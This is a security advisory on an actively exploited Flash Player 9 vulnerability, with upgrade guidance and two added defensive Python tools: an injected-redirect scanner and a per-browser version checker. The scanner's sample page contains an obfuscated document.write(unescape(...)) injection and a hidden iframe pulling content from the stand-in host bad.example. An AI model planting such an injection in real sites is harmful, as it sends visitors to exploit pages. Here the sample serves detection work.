Infesting you with Virus News
 

Vulnerabilities

Adobe Flash remote vulnerability (PC1-2008-0440)

Overview

Vulnerability chart

Overview: A vulnerability affecting Adobe Flash Player 9 is being actively exploited to install malicious software.
Vulnerable: Adobe Flash Player
Access: Remote
Patch availability: Unknown
Patch implementation: Unknown

References to Advisories, Solutions, and Tools

Release date: 2008-05-28
Description:

A vulnerability in Flash Player 9 is being actively exploited. The latest version of Flash Player (9.0.124.0) appears to correct the vulnerability. Analysis indicates that this vulnerability is the same as, or similar to, the one described in Application Specific Attacks: Leveraging the ActionScript Virtual Machine by Mark Dowd. The vulnerability depends on ActionScript 3.0, which was introduced in Flash Player 9, so earlier versions do not appear to be affected.

To exploit this vulnerability, an attacker would need to convince a victim to open specially crafted Flash content. Public incident reports (SANS ISC, Symantec ThreatCon) indicate that this and possibly other Flash vulnerabilities are being actively exploited. The attacks involve multiple web sites, specially crafted Flash content, and obfuscated JavaScript that redirects the victim's browser to a site hosting the exploit, which then installs malicious software. Attackers may compromise otherwise trustworthy web sites through SQL injection or cross-site scripting vulnerabilities in order to inject JavaScript that sends visitors to the malicious Flash content.
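The injected-redirect pattern described above (a compromised site carrying an obfuscated inline script or a hidden iframe/embed that pulls Flash content from a third-party host) can be hunted for in a site's own pages. The scanner below is an added example written for this page, not code from US-CERT, Adobe or the incident reports; the allowlist model, the two obfuscation heuristics (a decode/eval call plus a long run of `%XX` escapes) and both sample pages are the author's constructions.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Tags whose attribute pulls remote content the visitor's browser will run or render.
REMOTE_ATTRS = {"script": "src", "iframe": "src", "embed": "src", "object": "data"}
# Assumed heuristics for an "obfuscated" inline loader: a decode/eval call combined with
# a long run of %XX escapes, the shape of the JavaScript the advisory describes.
OBFUSCATION_CALLS = re.compile(r"\b(eval|unescape|document\.write)\s*\(")
ESCAPE_RUN = re.compile(r"(?:%[0-9a-fA-F]{2}){16,}")


class InjectScanner(HTMLParser):
    """Collect (kind, detail) findings for content loaded from hosts outside the allowlist
    and for inline scripts matching the obfuscation heuristics."""

    def __init__(self, allowed_hosts):
        super().__init__()
        self.allowed = {h.lower() for h in allowed_hosts}
        self.findings = []
        self._in_script = False
        self._script_buf = []

    def _check_remote(self, kind, url):
        host = urlparse(url).hostname          # None for relative (same-origin) URLs
        if host and host.lower() not in self.allowed:
            self.findings.append((kind, url))

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "script":
            self._in_script, self._script_buf = True, []
        attr = REMOTE_ATTRS.get(tag)
        if attr and attrs.get(attr):
            self._check_remote("external-" + tag, attrs[attr])
        # <object> Flash embeds usually repeat the movie URL in <param name="movie">.
        if tag == "param" and attrs.get("name", "").lower() == "movie" and attrs.get("value"):
            self._check_remote("external-movie", attrs["value"])

    def handle_data(self, data):
        if self._in_script:
            self._script_buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
            body = "".join(self._script_buf)
            if OBFUSCATION_CALLS.search(body) and ESCAPE_RUN.search(body):
                self.findings.append(("obfuscated-inline-script", body[:60]))


def scan_html(html, allowed_hosts):
    """Return the list of findings for one page; an empty list means nothing suspicious."""
    scanner = InjectScanner(allowed_hosts)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample pages (not captured from any real site).
CLEAN_PAGE = """<html><body>
<script src="/js/site.js"></script>
<object data="/media/intro.swf"><param name="movie" value="/media/intro.swf"></object>
</body></html>"""

INJECTED_PAGE = """<html><body>
<script src="/js/site.js"></script>
<script>document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%62%61%64%2E%65%78%61%6D%70%6C%65%2F%22%3E%3C%2F%69%66%72%61%6D%65%3E'))</script>
<iframe src="http://bad.example/flash/" width="0" height="0"></iframe>
</body></html>"""

if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("injected", INJECTED_PAGE)):
        print(name, scan_html(page, ["www.example.com"]))
```

Run it over a crawl of your own site with your real hostnames (and any CDN you use) in the allowlist; relative URLs are treated as same-origin and never flagged, so a compromised first-party script file still has to be checked by other means (file integrity, diff against source control).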

The vulnerability (or vulnerabilities) used in these attacks is described in US-CERT Vulnerability Notes VU#395473 and VU#159523. According to a post on the Adobe Product Security Incident Response Team (PSIRT) blog, the exploit "...appears to be taking advantage of a known vulnerability, reported by Mark Dowd of the ISS X-Force and wushi of team509, that was resolved in Flash Player 9.0.124.0 (CVE-2007-0071)."

Impact:

By exploiting this vulnerability, a remote, unauthenticated attacker may be able to execute arbitrary code. Multiple sources report that attackers are exploiting it to install malicious software.

Solution:

Upgrade to Flash Player 9.0.124.0 or later. The installation process for Flash Player differs by web browser and platform. Take care to upgrade Flash Player in every web browser that supports it.

  • Microsoft Windows users should upgrade the Flash ActiveX control by visiting the Adobe Flash Player Download Center using Internet Explorer (IE). This is necessary even if IE is not the primary browser, since other programs may use IE to view Flash content. Alternately, download the stand-alone installer for the Flash Player ActiveX control.
  • Users with other web browsers and operating systems should visit the Adobe Flash Player Download Center using each browser that supports Flash. Alternately, download the stand-alone installer for the Flash Player Netscape-style plug-in.

To check the version of Flash Player, visit the Version test for Adobe Flash Player using each web browser that supports Flash.
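Because each browser carries its own copy of Flash (the ActiveX control for IE, the Netscape-style plug-in for the others), the version check has to be repeated per browser and the answers compared against 9.0.124.0. The helper below is an added example written for this page, not Adobe's version test page; it parses the three string shapes Flash reports through a browser ("WIN 9,0,115,0" from the ActiveX control's `$version` variable, "Shockwave Flash 9.0 r115" from the NPAPI plug-in description, and the dotted form), and the sample host and the classification labels are the author's constructions.

```python
import re

# First fixed build per Adobe bulletin APSB08-11; ActionScript 3 (the attacked code path)
# only exists from Flash Player 9 onward, as the advisory notes.
FIXED = (9, 0, 124, 0)
FIRST_AS3 = (9, 0, 0, 0)

_DOTTED = re.compile(r"(\d+)[.,](\d+)[.,](\d+)(?:[.,](\d+))?")   # 9.0.115.0 or WIN 9,0,115,0
_PLUGIN = re.compile(r"(\d+)\.(\d+)\s+r(\d+)")                   # Shockwave Flash 9.0 r115


def parse_flash_version(text):
    """Return (major, minor, release, build) from the strings Flash reports through a browser:
       'WIN 9,0,115,0'             ActiveX control, GetVariable('$version')
       'Shockwave Flash 9.0 r115'  navigator.plugins description for the NPAPI plug-in
       '9.0.115.0'                 dotted form shown on Adobe's version test page
    Raises ValueError when no version is present."""
    m = _DOTTED.search(text)
    if m:
        return tuple(int(g or 0) for g in m.groups())
    m = _PLUGIN.search(text)
    if m:
        major, minor, release = (int(g) for g in m.groups())
        return (major, minor, release, 0)
    raise ValueError(f"no Flash version found in {text!r}")


def assess(text):
    """Classify one reported version string (labels are this example's own)."""
    v = parse_flash_version(text)
    if v < FIRST_AS3:
        return "pre-as3"      # no ActionScript 3 VM, not affected by this bug, but still outdated
    if v < FIXED:
        return "vulnerable"
    return "fixed"


def browsers_needing_upgrade(reports):
    """reports: {browser name: version string as that browser reports it}.
    Returns the browsers whose Flash is older than the fixed build; each browser's
    copy is checked separately because IE's ActiveX control and the NPAPI plug-in
    are installed independently."""
    return sorted(b for b, s in reports.items() if assess(s) != "fixed")


# Constructed sample host where only Firefox has been updated (not real inventory data).
SAMPLE_HOST = {
    "Internet Explorer": "WIN 9,0,115,0",
    "Firefox": "Shockwave Flash 9.0 r124",
    "Opera": "9.0.47.0",
}

if __name__ == "__main__":
    for browser, reported in SAMPLE_HOST.items():
        print(f"{browser:18} {reported:28} {assess(reported)}")
    print("needs upgrade:", browsers_needing_upgrade(SAMPLE_HOST))
```

A host that reports "fixed" in one browser and "vulnerable" in another is the case the advisory warns about: the stand-alone ActiveX and plug-in installers must both be run, and the check repeated in each browser afterwards.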

References:
http://www.us-cert.gov/reading_room/securing_browser/
http://www.kb.cert.org/vuls/id/395473
http://www.kb.cert.org/vuls/id/159523
http://blogs.adobe.com/psirt/2008/05/potential_flash_player_issue_u_1.htm
http://www.adobe.com/go/getflash
http://www.adobe.com/go/tn_15507
http://www.adobe.com/support/security/bulletins/apsb08-11.html
http://www.adobe.com/go/full_flashplayer_win_ie
http://www.adobe.com/go/full_flashplayer_win
http://www.adobe.com/devnet/actionscript/articles/actionscript3_overview.html
http://isc.sans.org/diary.html?storyid=4468
http://www.symantec.com/security_response/threatconlearn.jsp
https://addons.mozilla.org/addon/722
https://addons.mozilla.org/addon/433
http://documents.iss.net/whitepapers/IBM_X-Force_WP_final.pd
